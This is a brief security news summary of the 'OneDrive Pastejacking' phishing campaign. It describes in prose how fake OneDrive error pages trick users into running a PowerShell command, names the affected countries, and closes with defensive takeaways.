Who:
Target: Microsoft OneDrive users.
Attackers: Cybercriminals leveraging phishing techniques.
Researchers: Trellix security researcher Rafael Pena and others.
What:
Phishing Campaign: Dubbed "OneDrive Pastejacking," the campaign tricks users into running a malicious PowerShell script.
Attack Method: Users receive an email with an HTML file mimicking a OneDrive error page, prompting them to execute a PowerShell command to fix a supposed DNS issue. This command downloads and executes malicious files.
Impact:
Affected Regions: The campaign targets users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
Malicious Actions: The PowerShell script compromises systems by creating a folder, downloading an archive, and executing its contents using AutoIt3.exe.
Security Implications: Increased prevalence of phishing attacks using social engineering to bypass security measures, exploiting legitimate platforms like Microsoft Office Forms and Discord's CDN infrastructure.
Detection Evasion: Attackers use tactics like disguising HTML payloads as MPEG files in ZIP archives to evade Secure Email Gateways (SEGs).
Key Takeaways:
Vigilance Needed: Users should be cautious of unexpected emails, especially those prompting actions involving PowerShell or DNS updates.
Use Official Channels: Verify any instructions or fixes through official support channels and websites.
Enhanced Security Measures: Organizations should reinforce email security protocols and educate users on identifying phishing attempts.
Read the full article HERE